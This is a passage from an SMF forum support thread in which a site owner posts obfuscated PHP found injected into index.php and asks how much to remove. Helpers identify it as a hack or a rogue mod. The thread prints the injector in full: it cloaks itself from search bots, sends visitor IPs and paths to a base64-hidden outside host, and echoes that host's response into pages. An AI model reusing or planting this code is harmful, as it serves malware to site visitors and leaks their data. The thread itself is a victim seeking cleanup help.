SMF Support > SMF 2.0.x Support

Obsifucated Code

(1/5) > >>

XHIBIT911:
I found this code in my index.php.  Random people had been saying my site had some type of virus and this is after I had scanned on about 9 website checkers. It happens randomly and only AVG, Nortons and another security suite can detect it.


--- Code: ---// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
--- End code ---


So the other day when I went to Base64Decode : http://www.base64decode.org/

I entered the string that was in the code below:

--- Code: ---( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw')
--- End code ---

The URL it decoded was this: http://adveconfirm.com/stat/stat.php

I need to know is it safe to find and remove all of this code from any files its located in ?
or just how much of this code needs to go ?


--- Code: ---// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>
--- End code ---

busterone:
I am not a developer, but I don't think that code is part of SMF. It either came from a unapproved mod that you installed or you have been hacked. The url that the base64 code points to is a reported attack page. That could very well be where I got the "security scan" fake antivirus malware when I visited your site a few days ago. 

XHIBIT911:
EXACTLY !

And I when I did a whois check on that site theyre hella shady.
As in very very very shady.
I'll post more about them in a sec...but how much of that code can i remove without destroying my site ?

XHIBIT911:
And this is something I discovered about the website that is the cause of the malware and was base64'd on my website.


http://www.dslreports.com/forum/r25294235-Can-someone-check-out-this-site-

After doing a google serach and a whois I'm 1000% certain that this is where it stems from because thats where the code after its debugged tried to open. Here are Google results about the website

https://www.google.com/#hl=en&gs_nf=1&tok=qvGXr_ZufaVukF2eBZMuHw&cp=15&gs_id=6j&xhr=t&q=adveconfirm.com&pf=p&safe=off&output=search&sclient=psy-ab&oq=adveconfirm.com&gs_l=&pbx=1&fp=1&biw=1024&bih=593&bav=on.2,or.r_gc.r_pw.r_qf.,cf.osb&cad=b


Notice how many server and other changes this domain has had in the last year, like theyre trying to cover their tracks.

http://whois.domaintools.com/adveconfirm.com

busterone:
Upon just a glace, none of that is SMF code. I just searched a fresh copy of index.php and none of that is in there. It may be from a mod that you have installed, or as I said, you have been hacked. If it is from a mod, uninstall the mod and delete all of that code. If not, delete it anyway.
To be safe, it may even be a better idea to search all your files for any other files that are NOT part of a SMF install. They could be a way to get in to your site.

Navigation

[0] Message Index

[#] Next page

Go to full version